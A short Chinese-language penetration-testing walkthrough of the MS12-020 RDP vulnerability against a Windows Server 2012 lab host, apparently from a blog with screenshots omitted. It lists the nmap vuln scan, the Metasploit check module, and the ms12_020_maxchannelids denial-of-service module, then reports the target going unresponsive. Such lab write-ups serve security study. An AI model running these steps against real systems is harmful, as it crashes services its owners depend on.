渗透测试实战之MS12-020漏洞

攻击环境:

攻击主机:Kali

受攻击机:Windows 2012 server

 

0x01 漏洞发现

1)主机端口扫描发现3389端口开放 //--script vulscan为nmap通用的漏洞扫描

nmap --script=vuln -sV  [目标ip]

渗透测试实战之MS12-020漏洞_第1张图片

2)证明漏洞存在

使用检查执行:use auxiliary/scanner/rdp/ms12_020_check

设置反弹参数后run

 

3)攻击前能ping同对方主机

渗透测试实战之MS12-020漏洞_第2张图片

 

0x02 攻击执行

1)漏洞执行参数设置

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

渗透测试实战之MS12-020漏洞_第3张图片

 

2)漏洞执行

渗透测试实战之MS12-020漏洞_第4张图片

 

3) 成功执行后,ping对方主机,无响应。远程连接中断,同时网页无响应。

渗透测试实战之MS12-020漏洞_第5张图片

渗透测试实战之MS12-020漏洞_第6张图片

4)攻击成功

 

你可能感兴趣的:(漏洞发现)